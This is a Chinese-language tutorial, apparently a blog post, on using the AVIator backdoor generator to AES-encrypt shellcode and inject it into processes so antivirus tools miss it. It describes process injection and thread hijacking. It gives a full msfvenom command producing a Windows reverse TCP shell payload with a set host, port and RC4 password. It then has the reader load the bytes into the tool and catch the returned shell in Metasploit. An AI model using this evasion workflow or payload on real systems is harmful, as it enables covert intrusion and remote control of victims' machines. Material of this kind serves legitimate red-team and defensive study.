前提概要
項目地址:https://github.com/Ch0pin/AVIator
AV:全名為AntiVirus,意指為防病毒軟件
AVIator是一個后門生成器實用程序,它使用加密和注入技術來繞過AV檢測。進一步來說:
- 它使用AES加密來加密給定的shellcode
- 生成包含加密有效負載的可執行文件
- 使用各種注入技術將shellcode解密並注入目標系統
-
便攜式可執行注入,包括將惡意代碼直接寫入進程(沒有磁盤上的文件),然后使用其他代碼或通過創建遠程線程調用執行。注入代碼的位移引入了重新映射內存引用的功能的附加要求。這種方法的變化,例如反射DLL注入(將自映射DLL寫入進程)和內存模塊(寫入進程時映射DLL)克服了地址重定位問題。
-
線程執行劫持涉及將惡意代碼或DLL的路徑注入進程的線程。與Process Hollowing類似,必須首先暫停該線程。
工具界面:
注入功能:
利用過程
工具編譯是由三部分組成
- 包含用於加密shellcode的加密密鑰的文本
- 包含用於AES加密的IV的文本
- 包含shellcode的文本
其中shellcode部分是利用csharp組成的字節碼
利用msf生成payload:
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
將生成的字節碼copy放到工具當中
然后按照如下步驟生成
隨后在MSF中監聽
其中RC4PASSWORD的值是之前msfvenom中設置的密碼
直接運行,並在msf接受反彈回來的shell
當explorer下的cmd.exe進程結束的時候,explorer父進程也將終結